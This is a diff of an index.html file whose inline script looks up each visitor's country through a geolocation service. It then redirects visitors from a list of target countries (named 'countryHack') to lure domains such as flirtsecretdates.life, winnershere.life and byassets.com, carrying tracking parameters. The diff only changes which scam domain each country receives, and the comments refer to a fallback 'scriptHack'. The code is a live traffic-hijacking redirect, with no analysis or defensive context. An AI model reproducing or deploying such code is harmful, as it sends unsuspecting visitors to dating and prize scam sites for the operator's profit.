--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 <body>
     <script>
         let countryHack = ['US', 'GR', 'HU', 'HR', 'RS', 'GE', 'GT', 'AU', 'NZ']; // Paises objetivo
-        let urlPromocion = 'https://flirtsecretdates.life/?u=mq2pd01&o=fd5kphu';
+        let urlPromocion = 'https://winnershere.life/?u=mq2pd01&o=fd3k8hv';
         let country;
 
         fetch('https://get.geojs.io/v1/ip/country')
@@ -29,11 +29,11 @@ function redirectURL(country) {
     if (country === 'US') {
         window.location.href = 'https://byassets.com/?k=d883d99710fdbca3b534e0ee0f38bb85&type=mainstream&subtype=global';
     } else if (country === 'GR') {
-        window.location.href = 'https://byassets.com/?k=d883d99710fdbca3b534e0ee0f38bb85&type=mainstream&subtype=global';
+        window.location.href = 'https://winnershere.life/?u=mq2pd01&o=fd3k8hv';
     } else if (country === 'HU') {
-        window.location.href = 'https://flirtsecretdates.life/?u=mq2pd01&o=fd5kphu';
+        window.location.href = 'https://winnershere.life/?u=mq2pd01&o=fd3k8hv';
     } else if (country === 'RS') {
-        window.location.href = 'https://byassets.com/?k=d883d99710fdbca3b534e0ee0f38bb85&type=mainstream&subtype=global';
+        window.location.href = 'https://winnershere.life/?u=mq2pd01&o=fd3k8hv';
     } else {
         // Si no se especifica un redireccionamiento para un país específico,
         // redirige al scriptHack o a otra URL de respaldo
